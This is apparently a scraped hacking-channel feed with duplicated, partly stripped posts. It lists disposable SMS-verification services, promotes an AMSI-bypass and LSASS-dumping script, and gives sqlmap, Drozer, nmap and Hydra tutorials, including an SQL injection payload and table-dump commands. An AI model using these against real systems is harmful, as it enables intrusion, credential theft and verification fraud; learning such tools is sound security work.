🦑Biggest collections of free cybersecurity resources, here are some top options:
1. Exploit Databases
Exploit-DB: A massive archive of public exploits and software vulnerabilities.
Packet Storm Security: Exploits, tools, and advisories.
0day.today: Exploits and security-related content (registration may be required).
2. Cybersecurity News and CVE Updates
Undercode: Dedicated to cybersecurity, hacking, and tech news.
DailyCVE: A curated resource for the latest CVEs and vulnerability information.
3. Open Source Intelligence (OSINT) Tools
OSINT Framework: A curated collection of OSINT tools and resources.
Maltego Community Edition: OSINT and link analysis software.
4. Cybersecurity Learning Platforms
Hack The Box: Free labs for ethical hacking and pentesting (community edition).
TryHackMe: Interactive hacking and cybersecurity challenges with many free rooms.
OverTheWire: Linux and cybersecurity wargames.
5. Malware and Threat Analysis
VirusShare: Massive collection of malware samples for researchers.
Hybrid Analysis: Free malware analysis service.
ANY.RUN: Free interactive sandbox for analyzing malware.
6. Cybersecurity Tools and Frameworks
Kali Linux: Penetration testing operating system with a large collection of pre-installed tools.
Parrot Security OS: Another Linux distribution for security and privacy.
Metasploit: Penetration testing framework with free options.
7. Online Libraries and Knowledge Bases
MITRE ATT&CK: Knowledge base of adversary tactics and techniques.
CVE Details: Comprehensive vulnerability database.
CyberChef: Cybersecurity and encryption toolkit.
8. Forums and Communities
Reddit: r/cybersecurity: Discussions, resources, and updates.
BleepingComputer: Forums and guides for malware removal and security.
9. Threat Intelligence Platforms
AlienVault OTX: Free threat-sharing platform.
Cisco Talos Intelligence: Free threat intelligence resources.
1. Exploit Databases
Exploit-DB: A massive archive of public exploits and software vulnerabilities.
Packet Storm Security: Exploits, tools, and advisories.
0day.today: Exploits and security-related content (registration may be required).
2. Cybersecurity News and CVE Updates
Undercode: Dedicated to cybersecurity, hacking, and tech news.
DailyCVE: A curated resource for the latest CVEs and vulnerability information.
3. Open Source Intelligence (OSINT) Tools
OSINT Framework: A curated collection of OSINT tools and resources.
Maltego Community Edition: OSINT and link analysis software.
4. Cybersecurity Learning Platforms
Hack The Box: Free labs for ethical hacking and pentesting (community edition).
TryHackMe: Interactive hacking and cybersecurity challenges with many free rooms.
OverTheWire: Linux and cybersecurity wargames.
5. Malware and Threat Analysis
VirusShare: Massive collection of malware samples for researchers.
Hybrid Analysis: Free malware analysis service.
ANY.RUN: Free interactive sandbox for analyzing malware.
6. Cybersecurity Tools and Frameworks
Kali Linux: Penetration testing operating system with a large collection of pre-installed tools.
Parrot Security OS: Another Linux distribution for security and privacy.
Metasploit: Penetration testing framework with free options.
7. Online Libraries and Knowledge Bases
MITRE ATT&CK: Knowledge base of adversary tactics and techniques.
CVE Details: Comprehensive vulnerability database.
CyberChef: Cybersecurity and encryption toolkit.
8. Forums and Communities
Reddit: r/cybersecurity: Discussions, resources, and updates.
BleepingComputer: Forums and guides for malware removal and security.
9. Threat Intelligence Platforms
AlienVault OTX: Free threat-sharing platform.
Cisco Talos Intelligence: Free threat intelligence resources.
Exploit-Db
OffSec’s Exploit Database Archive
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
itsourcecode Banking Management System admin_class.php username sql injection cve
https://vuldb.com/?ctiid.269168
https://vuldb.com/?ctiid.269168
🦑Free Limited, Summarised Hacking Videos
https://www.udemy.com/tutorial/microsoft-security-fundamentals/honeypots/
https://www.udemy.com/tutorial/the-complete-ceh-exam-prep-course-become-an-ethical-hacker/most-powerful-hacking-tool-on-the-internet-today/
https://www.udemy.com/tutorial/penetration-testing/basic-terminology-such-as-white-hat-grey-hat-and-black-hat-hacking/
https://www.udemy.com/course/spring-boot-tutorial-for-beginners/?couponCode=BFCPSALE24
https://www.udemy.com/tutorial/real-world-ethical-hacking/overview-what-is-ethical-hacking/
https://www.udemy.com/tutorial/learn-python-and-ethical-hacking-from-scratch/how-to-bypass-https/
https://www.udemy.com/tutorial/hands-on-complete-penetration-testing-and-ethical-hacking/foca-fingerprinting-organisations-with-collected-archives/
https://www.udemy.com/tutorial/ethical-hacking-with-metasploit-exploit-post-exploit/win8-add-vmware/
https://www.udemy.com/tutorial/operating-systems-from-scratch-part1/introduction-to-computer-systems/
https://www.udemy.com/tutorial/the-complete-nmap-ethical-hacking-course-network-security/what-is-nmap/
https://www.udemy.com/tutorial/the-absolute-beginners-guide-to-information-cyber-security/the-trinity-of-it-security-cia/
https://www.udemy.com/tutorial/network-infrastructure-hacking/introduction-to-ethical-hacking-footprinting-and-reconnaissance/
https://www.udemy.com/tutorial/microsoft-security-fundamentals/honeypots/
https://www.udemy.com/tutorial/the-complete-ceh-exam-prep-course-become-an-ethical-hacker/most-powerful-hacking-tool-on-the-internet-today/
https://www.udemy.com/tutorial/penetration-testing/basic-terminology-such-as-white-hat-grey-hat-and-black-hat-hacking/
https://www.udemy.com/course/spring-boot-tutorial-for-beginners/?couponCode=BFCPSALE24
https://www.udemy.com/tutorial/real-world-ethical-hacking/overview-what-is-ethical-hacking/
https://www.udemy.com/tutorial/learn-python-and-ethical-hacking-from-scratch/how-to-bypass-https/
https://www.udemy.com/tutorial/hands-on-complete-penetration-testing-and-ethical-hacking/foca-fingerprinting-organisations-with-collected-archives/
https://www.udemy.com/tutorial/ethical-hacking-with-metasploit-exploit-post-exploit/win8-add-vmware/
https://www.udemy.com/tutorial/operating-systems-from-scratch-part1/introduction-to-computer-systems/
https://www.udemy.com/tutorial/the-complete-nmap-ethical-hacking-course-network-security/what-is-nmap/
https://www.udemy.com/tutorial/the-absolute-beginners-guide-to-information-cyber-security/the-trinity-of-it-security-cia/
https://www.udemy.com/tutorial/network-infrastructure-hacking/introduction-to-ethical-hacking-footprinting-and-reconnaissance/
Udemy
What is a Honeypot | Free Video Tutorial | Udemy
Learn the Fundamentals of Information Security for the Windows Operating System | Learn from instructors on any topic
2024 list, Receive sms online/ Virtual Phone Numbers:
1.textrapp.com
2.quackr.io (Good for Gmail/Google)
3.https://anonymsms.com/
4. https://receive-smss.live/ (May work for Telegram account, depends on the number)
5.https://smsreceivefree.com/
6.https://tempsmss.com/
7.https://www.receivesms.co/
8.https://sms24.me
9.https://receive-smss.com/
10.https://freephonenum.com/
11.https://smsget.net (Only Russian numbers)
12.https://mytempsms.com/
Remember that free websites might be a little risky if you want to verify a personal account or a financial account because the sms received to that simcard is public to everyone.
Paid websites
1. https://smspinverify.com/ (They offer cheap prices for Google Voice ($0.78) and have multiple options for this service. Moreover, they have simcards from US, UK, Canada, India, Russia and more than 50 countries and accept Binance Pay, Cryptocurrency, Visa/MasterCard and other payment methods less popular. Works great for the most popular services and it is very cheap. Their API is basic but works good. 10/10.)
2. https://majorphones.com/ (They have a new beta version and offer high quality numbers of USA/UK only. They accept Amazon Pay (VISA/MasterCard)/cryptocurrency/Binance Pay/PerfectMoney/Payeer and others. Moreover, they are now offering long-term numbers, more commonly known as rental numbers, for 7/15/30 days, depending on the country (USA/UK). Their API is only available if you request it to their customer support, so I couldn't test it. 10/10.)
3. https://verifywithsms.com/ (They offer only short-term numbers from USA and UK, the prices are a little high but works good and they accept only cryptocurrency. Don't have an API. 8/10.)
4. https://www.textverified.com/ (They offer only short and long term numbers from USA, most numbers work good but they are expensive. Plus, they accept VISA/Mastercard and crypto only. Very good API, robust. 7.5/10.)
5. https://5sim.net/ (They offer very very cheap numbers (+$0.1) but have poor quality, a lot of numbers are reused but eventually work. Worst is nothing. They accept VISA/Mastercard, cryptocurrency, what's great is that they offer +176 countries. API with some errors and doesn't have some functionalities 6/10.)
6. https://www.smscodes.io/ (They offer 0.5$ of bonus when you sign up and the prices go from 0.1$, they support voice verification (BIG DEAL), the problem is with the payment methods: cryptocurrency and other less known payment methods, the numbers have regular quality but works for most services. 9/10.)
7. smspva.com (They offer a lot of companies but this service in particular is too bad, in some cases they do not give a refund for numbers that dont work, most numbers are reused and for long-term numbers you must wait +30 min to activate the number, in conclusion this service is very very bad, not recommended. 3/10.)
8. Non-Voip.com (they offer USA & UK numbers with good quality at a cheap price. Their API sucks and customer support may be a little slow, I used it mostly for Telegram accounts. Bad API, you can't cancel a number and get a refund. 5/10.
Source: blackhatworld Forum
1.textrapp.com
2.quackr.io (Good for Gmail/Google)
3.https://anonymsms.com/
4. https://receive-smss.live/ (May work for Telegram account, depends on the number)
5.https://smsreceivefree.com/
6.https://tempsmss.com/
7.https://www.receivesms.co/
8.https://sms24.me
9.https://receive-smss.com/
10.https://freephonenum.com/
11.https://smsget.net (Only Russian numbers)
12.https://mytempsms.com/
Remember that free websites might be a little risky if you want to verify a personal account or a financial account because the sms received to that simcard is public to everyone.
Paid websites
1. https://smspinverify.com/ (They offer cheap prices for Google Voice ($0.78) and have multiple options for this service. Moreover, they have simcards from US, UK, Canada, India, Russia and more than 50 countries and accept Binance Pay, Cryptocurrency, Visa/MasterCard and other payment methods less popular. Works great for the most popular services and it is very cheap. Their API is basic but works good. 10/10.)
2. https://majorphones.com/ (They have a new beta version and offer high quality numbers of USA/UK only. They accept Amazon Pay (VISA/MasterCard)/cryptocurrency/Binance Pay/PerfectMoney/Payeer and others. Moreover, they are now offering long-term numbers, more commonly known as rental numbers, for 7/15/30 days, depending on the country (USA/UK). Their API is only available if you request it to their customer support, so I couldn't test it. 10/10.)
3. https://verifywithsms.com/ (They offer only short-term numbers from USA and UK, the prices are a little high but works good and they accept only cryptocurrency. Don't have an API. 8/10.)
4. https://www.textverified.com/ (They offer only short and long term numbers from USA, most numbers work good but they are expensive. Plus, they accept VISA/Mastercard and crypto only. Very good API, robust. 7.5/10.)
5. https://5sim.net/ (They offer very very cheap numbers (+$0.1) but have poor quality, a lot of numbers are reused but eventually work. Worst is nothing. They accept VISA/Mastercard, cryptocurrency, what's great is that they offer +176 countries. API with some errors and doesn't have some functionalities 6/10.)
6. https://www.smscodes.io/ (They offer 0.5$ of bonus when you sign up and the prices go from 0.1$, they support voice verification (BIG DEAL), the problem is with the payment methods: cryptocurrency and other less known payment methods, the numbers have regular quality but works for most services. 9/10.)
7. smspva.com (They offer a lot of companies but this service in particular is too bad, in some cases they do not give a refund for numbers that dont work, most numbers are reused and for long-term numbers you must wait +30 min to activate the number, in conclusion this service is very very bad, not recommended. 3/10.)
8. Non-Voip.com (they offer USA & UK numbers with good quality at a cheap price. Their API sucks and customer support may be a little slow, I used it mostly for Telegram accounts. Bad API, you can't cancel a number and get a refund. 5/10.
Source: blackhatworld Forum
AnonymSMS
Receive SMS Online 24/7, Secure Verification - AnonymSMS
Totally free online service whereby you can Receive SMS Online, without the need of inputting your own mobile/cell number.
🔥 Bypass AV / EDR Tested🔥
✔ The Invoke-ASAMSI script is a tool that takes advantage of the native features of PowerShell and .NET functions using reflection, to modify the memory of amsi.dll, disable its malware scanning and be able to execute malicious scripts and code.
✔ I have also included how we can dump the LSASS together with Nanodump, demonstrating that with public tools and customizing them a little you can do good evasion.
🔥Source Link -->
https://lnkd.in/gMeFQCks
The Script:
https://github.com/ASP4RUX/Invoke-AMSI
✔ The Invoke-ASAMSI script is a tool that takes advantage of the native features of PowerShell and .NET functions using reflection, to modify the memory of amsi.dll, disable its malware scanning and be able to execute malicious scripts and code.
✔ I have also included how we can dump the LSASS together with Nanodump, demonstrating that with public tools and customizing them a little you can do good evasion.
🔥Source Link -->
https://lnkd.in/gMeFQCks
The Script:
https://github.com/ASP4RUX/Invoke-AMSI
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
Have you ever heard about BadUSB?
A BadUSB refers to a type of malicious attack that exploits the firmware of USB devices. This makes the attack particularly dangerous and stealthy because the BadUSB emulates a HID (Human Interface Device), which is inherently trusted by the operating system. Once connected, the attack begins as the BadUSB starts injecting commands, typing at a speed of up to 1000wpm, allowing it to execute malicious actions almost instantly.
Attack Scenario
In a busy office, an employee steps away from their desk, leaving their laptop unlocked.
The attack exploits the unlocked system's trust in peripherals, allowing the malicious USB to execute commands without the user’s awareness, compromising the company’s security within seconds.
Example of Actions
Backdoor Installation: The USB types out commands to open a PowerShell terminal and install a hidden backdoor, granting the attacker remote access to the system.
Credential Theft: It retrieves saved passwords or authentication tokens from the system and sends them to an external server.
Network Reconnaissance: It runs scripts to map the internal network, identifying key servers and vulnerable devices.
Data Exfiltration: Sensitive company files are quickly zipped and emailed or uploaded to a remote server.
Prevention Technique
To reduce the chances of success for a BadUSB attack, you can configure User Account Control to require a password for administrative actions. This limits the potential damage a malicious USB can cause.
Steps
1. Press the Windows Key, then type regedt in the search bar to open the Registry Editor.
2. Navigate to the following path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
3. Find the registry entry named ConsentPromptBehaviorAdmin.
4. By default, its value is set to “5” (prompt for consent without password). Change this value to “1”. This setting forces the system to prompt for the administrator's password every time a process or command requires elevated privileges.
From now on, any action that requires admin rights will trigger a password prompt, significantly reducing the success rate of a BadUSB attack.
Source: linkedin
A BadUSB refers to a type of malicious attack that exploits the firmware of USB devices. This makes the attack particularly dangerous and stealthy because the BadUSB emulates a HID (Human Interface Device), which is inherently trusted by the operating system. Once connected, the attack begins as the BadUSB starts injecting commands, typing at a speed of up to 1000wpm, allowing it to execute malicious actions almost instantly.
Attack Scenario
In a busy office, an employee steps away from their desk, leaving their laptop unlocked.
The attack exploits the unlocked system's trust in peripherals, allowing the malicious USB to execute commands without the user’s awareness, compromising the company’s security within seconds.
Example of Actions
Backdoor Installation: The USB types out commands to open a PowerShell terminal and install a hidden backdoor, granting the attacker remote access to the system.
Credential Theft: It retrieves saved passwords or authentication tokens from the system and sends them to an external server.
Network Reconnaissance: It runs scripts to map the internal network, identifying key servers and vulnerable devices.
Data Exfiltration: Sensitive company files are quickly zipped and emailed or uploaded to a remote server.
Prevention Technique
To reduce the chances of success for a BadUSB attack, you can configure User Account Control to require a password for administrative actions. This limits the potential damage a malicious USB can cause.
Steps
1. Press the Windows Key, then type regedt in the search bar to open the Registry Editor.
2. Navigate to the following path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
3. Find the registry entry named ConsentPromptBehaviorAdmin.
4. By default, its value is set to “5” (prompt for consent without password). Change this value to “1”. This setting forces the system to prompt for the administrator's password every time a process or command requires elevated privileges.
From now on, any action that requires admin rights will trigger a password prompt, significantly reducing the success rate of a BadUSB attack.
Source: linkedin
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Drozer is a security assessment framework for Android apps, developed by MWR InfoSecurity (now part of F-Secure). It's used by penetration testers to assess Android applications for vulnerabilities. Here's a hacking tutorial for using Drozer to identify vulnerabilities in Android apps.
---
## Prerequisites
1. Install Drozer:
Drozer consists of two components:
- Agent (installed on the Android device)
- Console (run on your host machine)
Download the Drozer agent APK from [official GitHub](https://github.com/FSecureLABS/drozer) and install it on your Android device. Install the Drozer console using:
2. Setup ADB:
Install Android Debug Bridge (ADB) to connect your Android device to your computer.
3. Rooted Device (Optional but Recommended):
Drozer can operate on non-rooted devices but works best with root privileges.
4. Enable USB Debugging:
Go to Settings > Developer Options > USB Debugging on your Android device.
---
## Step 1: Setting Up the Environment
1. Connect the Android Device:
Use ADB to ensure your device is detected:
2. Forward the Drozer Port:
Drozer communicates with the agent over port 31415. Forward this port using ADB:
3. Start the Drozer Agent:
Launch the Drozer agent app on your Android device and click "Start Server".
4. Launch Drozer Console:
On your host machine, open the Drozer console:
---
## Step 2: Reconnaissance
Drozer has a modular design, with commands categorized into packages. Start by gathering basic information.
1. List Installed Packages:
2. Find Specific Apps:
Search for apps by keyword, e.g., for "vulnerable":
3. Get Detailed App Information:
Get information about an app, such as permissions and activities:
---
## Step 3: Exploit Common Vulnerabilities
Drozer can be used to test various vulnerabilities, including exported activities, insecure file storage, and SQL injection.
### 1. Test Exported Components
Exported components can be accessed by any app on the device. Drozer identifies and interacts with these components.
#### Activities:
List exported activities:
Launch an exported activity:
#### Services:
List exported services:
Interact with a service:
#### Content Providers:
Identify content providers and their permissions:
Query content providers for data:
### 2. SQL Injection
Test content providers for SQL injection by manipulating query inputs:
### 3. Insecure Data Storage
Check for sensitive data in app directories:
### 4. Check for Debuggable Apps
Some apps are left in debuggable mode, exposing them to reverse engineering:
---
## Step 4: Automation and Exploit Modules
### Use Drozer's built-in exploit modules:
1. Scan for Known Vulnerabilities:
2. Check for World-Readable Files:
---
## Step 5: Generate Reports
Keep logs of your findings for documentation:
---
---
## Prerequisites
1. Install Drozer:
Drozer consists of two components:
- Agent (installed on the Android device)
- Console (run on your host machine)
Download the Drozer agent APK from [official GitHub](https://github.com/FSecureLABS/drozer) and install it on your Android device. Install the Drozer console using:
sudo apt install python3-pip
pip3 install drozer
2. Setup ADB:
Install Android Debug Bridge (ADB) to connect your Android device to your computer.
sudo apt install adb
3. Rooted Device (Optional but Recommended):
Drozer can operate on non-rooted devices but works best with root privileges.
4. Enable USB Debugging:
Go to Settings > Developer Options > USB Debugging on your Android device.
---
## Step 1: Setting Up the Environment
1. Connect the Android Device:
Use ADB to ensure your device is detected:
adb devices
2. Forward the Drozer Port:
Drozer communicates with the agent over port 31415. Forward this port using ADB:
adb forward tcp:31415 tcp:31415
3. Start the Drozer Agent:
Launch the Drozer agent app on your Android device and click "Start Server".
4. Launch Drozer Console:
On your host machine, open the Drozer console:
drozer console connect
---
## Step 2: Reconnaissance
Drozer has a modular design, with commands categorized into packages. Start by gathering basic information.
1. List Installed Packages:
run app.package.list
2. Find Specific Apps:
Search for apps by keyword, e.g., for "vulnerable":
run app.package.list -f vulnerable
3. Get Detailed App Information:
Get information about an app, such as permissions and activities:
run app.package.info -a com.example.vulnerableapp
---
## Step 3: Exploit Common Vulnerabilities
Drozer can be used to test various vulnerabilities, including exported activities, insecure file storage, and SQL injection.
### 1. Test Exported Components
Exported components can be accessed by any app on the device. Drozer identifies and interacts with these components.
#### Activities:
List exported activities:
run app.activity.info -a com.example.vulnerableapp
Launch an exported activity:
run app.activity.start --component com.example.vulnerableapp com.example.vulnerableapp.MainActivity
#### Services:
List exported services:
run app.service.info -a com.example.vulnerableapp
Interact with a service:
run app.service.send --component com.example.vulnerableapp com.example.vulnerableapp.MyService
#### Content Providers:
Identify content providers and their permissions:
run app.provider.info -a com.example.vulnerableapp
Query content providers for data:
run app.provider.query content://com.example.vulnerableapp.provider/data
### 2. SQL Injection
Test content providers for SQL injection by manipulating query inputs:
run app.provider.query content://com.example.vulnerableapp.provider/data --projection "' OR '1'='1"
### 3. Insecure Data Storage
Check for sensitive data in app directories:
run scanner.misc.filebrowser -a com.example.vulnerableapp
### 4. Check for Debuggable Apps
Some apps are left in debuggable mode, exposing them to reverse engineering:
run app.package.debuggable
---
## Step 4: Automation and Exploit Modules
### Use Drozer's built-in exploit modules:
1. Scan for Known Vulnerabilities:
run scanner.provider.injection -a com.example.vulnerableapp
2. Check for World-Readable Files:
run scanner.misc.world_readable_files
---
## Step 5: Generate Reports
Keep logs of your findings for documentation:
drozer console connect > output.log
---
Forwarded from Exploiting Crew (Pr1vAt3)
### Note:
This tutorial is intended for educational purposes only. Testing applications without explicit permission is illegal and unethical. Always adhere to your organization's policies or get consent from app owners before performing assessments.
---
Let me know if you'd like help with specific Drozer commands or use cases!
This tutorial is intended for educational purposes only. Testing applications without explicit permission is illegal and unethical. Always adhere to your organization's policies or get consent from app owners before performing assessments.
---
Let me know if you'd like help with specific Drozer commands or use cases!
GitHub
GitHub - ReversecLabs/drozer: The Leading Security Assessment Framework for Android.
The Leading Security Assessment Framework for Android. - ReversecLabs/drozer
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Mobile Security Framework (MobSF) Hacking Tutorial
MobSF (Mobile Security Framework) is an open-source automated pen-testing framework used for analyzing Android, iOS, and Windows apps. It supports both static and dynamic analysis, making it an essential tool for app security assessments.
---
## Prerequisites
1. Install MobSF:
- Clone the MobSF repository:
- Install dependencies and start the server:
Access MobSF via
2. Java Environment:
Ensure Java is installed for decompiling Android APKs:
3. Dynamic Analysis (Optional):
For dynamic analysis, you'll need:
- A VirtualBox VM or a rooted Android device.
- Genymotion (Android emulator).
---
## Step 1: Static Analysis
Static analysis examines the app's source code for vulnerabilities.
### Analyze an APK
1. Upload the APK file:
Drag and drop the APK onto the MobSF web interface.
2. Wait for processing:
MobSF will decompile the APK and display a detailed report.
### Review the Report
The report is divided into sections:
1. App Information:
Includes package name, version, permissions, and components.
2. Permissions Analysis:
Flags excessive or dangerous permissions like
3. Manifest Analysis:
Examines the
- Exported activities, services, and receivers.
- Insecure configurations.
4. Code Analysis:
Identifies potential vulnerabilities in the app's source code:
- Hardcoded API keys
- Weak encryption
- Unprotected credentials
5. Cryptographic Analysis:
Highlights insecure cryptographic practices, e.g., MD5 or hardcoded keys.
---
## Step 2: Dynamic Analysis
Dynamic analysis evaluates the app's behavior during runtime.
### Set Up Dynamic Analysis
1. Configure Emulator/Device:
- Install the MobSF dynamic analysis APK on the device.
- Set up ADB forwarding:
2. Launch Dynamic Analysis:
Start the dynamic analysis module in MobSF and connect your device.
3. Monitor Runtime Behavior:
- Inspect API calls, file system access, and network traffic.
- Use MobSF's built-in proxy for traffic analysis.
---
## Step 3: Advanced Features
1. Binary Analysis:
MobSF can analyze binaries (.so files) for vulnerabilities.
2. Memory Dump Analysis:
Inspect memory dumps for sensitive information like passwords or keys.
3. Malware Analysis:
Identify malicious patterns in APKs:
- Suspicious API usage
- Embedded malware signatures
---
## Step 4: Automation with REST API
MobSF provides an API for automation. Here's how to analyze an APK using the API:
1. Start MobSF API Server:
Enable the API server in
2. Submit an APK:
3. Retrieve Results:
---
## Step 5: Report Findings
Export the analysis report in various formats (PDF, HTML, JSON) for documentation.
---
### Common Use Cases
1. Testing Exported Components:
- Identify insecure exported activities, services, or receivers.
2. Analyzing Network Security:
- Check for plaintext HTTP traffic.
- Identify hardcoded server IPs or API keys.
3. Hardcoded Credentials:
- MobSF flags sensitive information like passwords embedded in the code.
---
### Important Notes
1. This tutorial is for ethical purposes. Ensure you have permission to test the app.
2. Use MobSF as part of a comprehensive app security assessment strategy.
---
Let me know if you'd like to explore specific features of MobSF!
MobSF (Mobile Security Framework) is an open-source automated pen-testing framework used for analyzing Android, iOS, and Windows apps. It supports both static and dynamic analysis, making it an essential tool for app security assessments.
---
## Prerequisites
1. Install MobSF:
- Clone the MobSF repository:
git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
- Install dependencies and start the server:
./setup.sh # For Linux/Mac
python3 -m pip install -r requirements.txt
python3 manage.py runserver
Access MobSF via
http://127.0.0.1:8000.2. Java Environment:
Ensure Java is installed for decompiling Android APKs:
sudo apt install openjdk-11-jdk
3. Dynamic Analysis (Optional):
For dynamic analysis, you'll need:
- A VirtualBox VM or a rooted Android device.
- Genymotion (Android emulator).
---
## Step 1: Static Analysis
Static analysis examines the app's source code for vulnerabilities.
### Analyze an APK
1. Upload the APK file:
Drag and drop the APK onto the MobSF web interface.
2. Wait for processing:
MobSF will decompile the APK and display a detailed report.
### Review the Report
The report is divided into sections:
1. App Information:
Includes package name, version, permissions, and components.
2. Permissions Analysis:
Flags excessive or dangerous permissions like
READ_SMS, WRITE_EXTERNAL_STORAGE, etc.3. Manifest Analysis:
Examines the
AndroidManifest.xml file for:- Exported activities, services, and receivers.
- Insecure configurations.
4. Code Analysis:
Identifies potential vulnerabilities in the app's source code:
- Hardcoded API keys
- Weak encryption
- Unprotected credentials
5. Cryptographic Analysis:
Highlights insecure cryptographic practices, e.g., MD5 or hardcoded keys.
---
## Step 2: Dynamic Analysis
Dynamic analysis evaluates the app's behavior during runtime.
### Set Up Dynamic Analysis
1. Configure Emulator/Device:
- Install the MobSF dynamic analysis APK on the device.
- Set up ADB forwarding:
adb forward tcp:5000 tcp:5000
2. Launch Dynamic Analysis:
Start the dynamic analysis module in MobSF and connect your device.
3. Monitor Runtime Behavior:
- Inspect API calls, file system access, and network traffic.
- Use MobSF's built-in proxy for traffic analysis.
---
## Step 3: Advanced Features
1. Binary Analysis:
MobSF can analyze binaries (.so files) for vulnerabilities.
2. Memory Dump Analysis:
Inspect memory dumps for sensitive information like passwords or keys.
3. Malware Analysis:
Identify malicious patterns in APKs:
- Suspicious API usage
- Embedded malware signatures
---
## Step 4: Automation with REST API
MobSF provides an API for automation. Here's how to analyze an APK using the API:
1. Start MobSF API Server:
Enable the API server in
settings.py.2. Submit an APK:
curl -F "file=@app.apk" http://127.0.0.1:8000/api/v1/upload -H "Authorization: <your_api_key>"
3. Retrieve Results:
curl http://127.0.0.1:8000/api/v1/report_json -H "Authorization: <your_api_key>"
---
## Step 5: Report Findings
Export the analysis report in various formats (PDF, HTML, JSON) for documentation.
---
### Common Use Cases
1. Testing Exported Components:
- Identify insecure exported activities, services, or receivers.
2. Analyzing Network Security:
- Check for plaintext HTTP traffic.
- Identify hardcoded server IPs or API keys.
3. Hardcoded Credentials:
- MobSF flags sensitive information like passwords embedded in the code.
---
### Important Notes
1. This tutorial is for ethical purposes. Ensure you have permission to test the app.
2. Use MobSF as part of a comprehensive app security assessment strategy.
---
Let me know if you'd like to explore specific features of MobSF!
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: SQLmap
SQLmap is an automated penetration testing tool for detecting and exploiting SQL injection vulnerabilities in databases.
---
### Basic Usage Command:
### Explanation:
-
-
-
---
### Advanced Example: Dumping a Database
Explanation:
-
---
### Example: Dump Tables from a Specific Database
Explanation:
-
-
---
### Use Case: Extracting Data from a Table
Explanation:
-
-
---
### Important Notes:
1. Always obtain proper authorization before testing a website or application.
2. Misuse of SQLmap for unauthorized activities is illegal and unethical. Use it responsibly for educational or security testing purposes only.
SQLmap is an automated penetration testing tool for detecting and exploiting SQL injection vulnerabilities in databases.
---
### Basic Usage Command:
sqlmap -u "http://example.com/index.php?id=1"
### Explanation:
-
sqlmap: Invokes the SQLmap tool.-
-u: Specifies the target URL.-
"http://example.com/index.php?id=1": Target URL with a parameter (id=1) to test for SQL injection.---
### Advanced Example: Dumping a Database
sqlmap -u "http://example.com/index.php?id=1" --dbs
Explanation:
-
--dbs: Enumerates all databases on the vulnerable server.---
### Example: Dump Tables from a Specific Database
sqlmap -u "http://example.com/index.php?id=1" -D mydatabase --tables
Explanation:
-
-D mydatabase: Specifies the database (mydatabase).-
--tables: Lists all tables in the specified database.---
### Use Case: Extracting Data from a Table
sqlmap -u "http://example.com/index.php?id=1" -D mydatabase -T users --dump
Explanation:
-
-T users: Specifies the table (users).-
--dump: Dumps all data from the specified table.---
### Important Notes:
1. Always obtain proper authorization before testing a website or application.
2. Misuse of SQLmap for unauthorized activities is illegal and unethical. Use it responsibly for educational or security testing purposes only.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Nmap (Network Mapper)
Nmap is a powerful tool for network discovery and security auditing.
---
### Basic Usage Command:
Explanation:
-
-
---
### Advanced Example: Scanning All Open Ports
Explanation:
-
---
### Example: Service and Version Detection
Explanation:
-
---
### Example: OS Detection
Explanation:
-
---
### Use Case: Full Network Scan
Explanation:
-
-
---
### Important Notes:
1. Use Nmap only on networks or systems where you have explicit permission to scan.
2. Unauthorized scanning can be illegal. Always ensure compliance with ethical guidelines.
Nmap is a powerful tool for network discovery and security auditing.
---
### Basic Usage Command:
nmap 192.168.1.1
Explanation:
-
nmap: Invokes the Nmap tool.-
192.168.1.1: Target IP address for scanning.---
### Advanced Example: Scanning All Open Ports
nmap -p- 192.168.1.1
Explanation:
-
-p-: Scans all 65,535 TCP ports instead of the default 1,000.---
### Example: Service and Version Detection
nmap -sV 192.168.1.1
Explanation:
-
-sV: Enables service version detection to identify software running on open ports.---
### Example: OS Detection
nmap -O 192.168.1.1
Explanation:
-
-O: Attempts to determine the operating system of the target.---
### Use Case: Full Network Scan
nmap -A 192.168.1.0/24
Explanation:
-
-A: Enables OS detection, version detection, script scanning, and traceroute.-
192.168.1.0/24: Scans all devices in the subnet.---
### Important Notes:
1. Use Nmap only on networks or systems where you have explicit permission to scan.
2. Unauthorized scanning can be illegal. Always ensure compliance with ethical guidelines.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Network Analyser Tool: Wireshark
Wireshark is a powerful network protocol analyzer used for capturing and examining network traffic in real time.
---
### Basic Usage Command:
Explanation:
- Launches the Wireshark GUI for network packet analysis.
---
### Example: Capturing Traffic on a Specific Interface
Explanation:
-
-
---
### Example: Save Captured Traffic to a File
Explanation:
-
---
### Example: Filter for HTTP Traffic
Explanation:
-
---
### Example: Analyze a Saved Packet Capture
Explanation:
- Opens the file
---
### Important Notes:
1. Always get permission before capturing network traffic.
2. Use Wireshark responsibly and ensure ethical usage for troubleshooting or learning purposes only.
Wireshark is a powerful network protocol analyzer used for capturing and examining network traffic in real time.
---
### Basic Usage Command:
wireshark
Explanation:
- Launches the Wireshark GUI for network packet analysis.
---
### Example: Capturing Traffic on a Specific Interface
tshark -i eth0
Explanation:
-
tshark: Command-line version of Wireshark.-
-i eth0: Specifies the network interface (eth0) to capture traffic.---
### Example: Save Captured Traffic to a File
tshark -i eth0 -w capture.pcap
Explanation:
-
-w capture.pcap: Saves the captured packets to a file named capture.pcap for later analysis in Wireshark.---
### Example: Filter for HTTP Traffic
tshark -i eth0 -f "tcp port 80"
Explanation:
-
-f "tcp port 80": Filters the capture to only include HTTP traffic.---
### Example: Analyze a Saved Packet Capture
wireshark capture.pcap
Explanation:
- Opens the file
capture.pcap in Wireshark for in-depth analysis.---
### Important Notes:
1. Always get permission before capturing network traffic.
2. Use Wireshark responsibly and ensure ethical usage for troubleshooting or learning purposes only.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Hydra
Hydra is a fast and flexible login brute-forcing tool that supports numerous protocols.
---
### Basic Usage Command:
Explanation:
-
-
-
-
-
---
### Example: Using a Password List
Explanation:
-
---
### Example: Brute-Forcing with Multiple Usernames
